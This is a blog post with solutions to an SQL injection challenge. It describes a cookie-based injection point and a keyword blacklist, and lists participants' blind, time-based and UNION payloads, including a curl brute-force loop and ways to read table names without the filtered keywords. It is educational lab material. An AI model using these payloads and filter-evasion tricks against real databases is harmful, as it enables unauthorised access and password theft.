Solutions for challenge 2A

Solutions for challenge 2A

Posted on July 12, 2012 by Roberto Salgado

After receiving many submissions for the SQL Injection challenge 2A, I decided it was time to show some of the solutions used to solve this challenge. In case you missed out on the series of SQL Injection challenges I released a few months ago, they are currently still online and available to try out. There are 3 challenges, each with part A and B. Out of all the challenges, challenge 2A ended up being one of the easier ones and since the solutions didn't vary too much, I decided to pick this challenge to be the first to show the solutions to.



DISCLAIMER: If you haven't tried this challenge, it is still available here (no longer available online) in case you want to give it a shot before reading the SOLUTIONS below.

What differentiates this challenge from the other challenges is that it allows you to log in as guest. In doing so, a welcome message is displayed showing the username and privileges and the cookie user_id is created. The cookie user_id, as the name says, has the id of the user, which in the case of guest is 1. If the value of the cookie is changed to 0, the message will now display admin as the username with administrator privileges. This is an indication that the username and privileges are determined from the user_id cookie, which is of course pulling that information from the MySQL database. Now that we know the injection point is in the cookie user_id, the next step is to figure out which characters are allowed and which are filtered.

The main idea behind this challenge is to figure out a way to retrieve the table/column names without using information_schema.tables/columns. For this reason, I decided to use very little filtering. Initially I had only blacklisted the following characters:

$blacklist = array('tables', 'columns', '(', ')');

Many WAF's rely on blocking the keywords 'tables' and 'columns', so I wanted to demonstrate that an attacker doesn't need those keywords in order the obtain the table/column names; I later added mysql_real_escape_string() as an extra layer of difficulty. Basically there are several other tables we can obtain the table/column names from other than information_schema.tables/columns, which are the two widely known ones. The only condition is that some require that the table/column have a key, and since each table should have a primary key, chances are high that this will work. Some examples are:





Some of the solutions I received used a method I had not anticipated when writing the challenge. This type of solution guessed the column name and extracted the password through a blind SQLi. In hindsight I should have added a prefix to the column names, so they couldn't be guessed as easily. However, I did learn something because of it: I knew the LIKE statement doesn't require quotations, what I didn't know is that you could use the wildcards % and ? without the quotations. Below are the solutions that were submitted:




Solution omitted as it can be used to solve challenge 2B.

First Category


user_id=0 and username='admin' and mid(password,1,1)='e'

Team Rebel:

user_id=0 and 1=(IF(ascii(substring(password,1,1))>100, (select benchmark(100000000,md5(0x41))), false))


user_id=0 and password LIKE "el%uitas"

NULL Life:

Submitted a PHP script found here.


user_id=0 and username=0x656c25


user_id=-1 OR password LIKE BINARY 0x{chars}25


user_id=0 and password like binary 0x456c25

Submitted a Python script found here.


user_id=0 and password like 0x[blind-here]25


userid=0 and password >= BINARY 0x41


for i in {2,3,4,5}; do for j in {0,1,2,3,4,5,6,7,8,9,0,A,B,C,D,E,F,G} ; do echo $i$j ; curl -b "user_id=0 and password LIKE 0x454C5F564552475549544153${i}${j}25" 2>&1 | grep ADMIN ;done ;done

Second Category

Sebastien Blot:


Miroslav Stampar:

user_id=-1 UNION ALL SELECT 1,2,TABLE_NAME,4 FROM information_schema.TABLE_CONSTRAINTS LIMIT 2,3

Paul da Silva:

userid=-1 union select null,COLUMN_NAME,TABLE_NAME,null from information_schema.KEY_COLUMN_USAGE where table_name<>0x7265676c6173 and table_name<>0x72756c6573 limit 0,1-- 




A full list of the victors for each challenge is available here.

Latest Blog Entries

New publication: Mastering the Nmap Scripting Engine
We invite you to learn more about the latest publication from our team, "Mastering the Nmap Scripting Engine".

Presentation on Optimization and Obfuscation Techniques for SQL Injections
A couple years ago Roberto Salgado had the honor of presenting his research on SQL Injections at several conferences. Just recently, Blackhat released the video of his presentation. This post contains the link to Roberto's slides and video.

Backdoors in Zhone GPON 2520 and Alcatel Lucent I240Q
While examining the "dropbear" binary for the Zhone GPON 2520 and Alcatel Lucent I240Q, we found that both routers have backdoors that allow users with SSH access to connect to these devices with maximum privileges.

Latest News

BSides Vancouver 2015
Websec is proud to announce that we will be attending the 3rd annual edition of BSides Vancouver, a local non-profit information security conference held in the heart of Vancouver, BC on March 16 and 17.

Websec present at Campus Party 2014
Websec will be participating with four conferences at the largest Campus Party ever held, which will take place from the 24-29 of June in Guadalajara, Mexico.